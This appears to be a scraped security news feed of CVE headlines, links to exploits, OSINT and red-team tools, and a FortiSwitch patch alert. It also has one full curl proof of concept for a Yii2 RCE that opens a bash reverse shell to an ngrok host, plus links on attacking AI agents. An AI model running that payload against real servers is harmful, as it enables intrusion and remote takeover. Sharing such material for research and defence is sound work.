İbrahim BALOĞLU - Siber Güvenlik Paylaşımları

C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations * read Отдельно порадовало

iptables -A INPUT -m geoip --src-cc RU,CN -j DROP

Windows Server 2025 dMSA Vulnerability * about * toolZ

CVE-2024–58136 — RCE PoC * Yii2 Framework

curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'

CVE-2025-21756: Attack of the Vsock * Linux Kernel Exploitation * read * exploit

F5 BIG-IP * Command Injection in Appliance mode 0x_

#tools #OSINT 1. DPULSE - Tool for complex approach to domain OSINT ]-> https://github.com/OSINT-TECHNOLOGIES/dpulse 2. reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities ]-> https://github.com/six2dez/reconftw

Cybersecurity Mastery Roadmap https://github.com/Hamed233/Cybersecurity-Mastery-Roadmap

CVE-2025-1094 * RCE SQL Injection in PostgreSQL 14.15 * exploit

#Infographics #Offensive_security AD Pentesting Mindmap https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg

CVE-2025-24076 and CVE-2025-24994 * 300 Milliseconds to Admin: Mastering DLL Hijacking and Hooking to Win the Race

CVE-2025-22457 * Ivanti Zero-Day

Ну это просто атас )))) CVE-2025-3155 - утечка ключей в ubuntu * Attack scenario

CVE-2025-2945 pgAdmin * WriteUP + Video + RCE POC

🚨 Critical alert for Fortinet users! A 9.3 CVSS flaw (CVE-2024-48887) in FortiSwitch lets hackers remotely change admin passwords — no login needed. 🔧 Fix it: Upgrade ASAP (7.6.1+, 7.4.5+, 7.2.9+, 7.0.11+, 6.4.15+) ⚡ No exploits yet—but Fortinet bugs have been weaponized before. 👉 Full details: https://thehackernews.com/2025/04/fortinet-urges-fortiswitch-upgrades-to.html

HackerOne disclosed on HackerOne: The /reports/:id.json endpoint... https://hackerone.com/reports/3000510

#exploit 1. CCleaner LPE Vulnerability on macOS https://blog.quarkslab.com/ccleaner_lpe_macos.html 2. CVE-2025-0868: Arbitrary Command Injection in DocsGPT https://github.com/shreyas-malhotra/PoC_CVE-2025-0868 3. CVE-2025-30208: Vite Arbitrary File Read vulnerability https://github.com/jackieya/CVE-2025-30208

#tools #MLSecOps 1. Access large language models from CLI https://github.com/simonw/llm 2. CVE-2023-44467: RCE in langchain PALChain https://arimlabs.ai/news/bypass-of-cve-2023-44467 3. AI Agent Security https://www.promptfoo.dev/blog/agent-security ]-> https://www.promptfoo.dev/docs/red-team/agents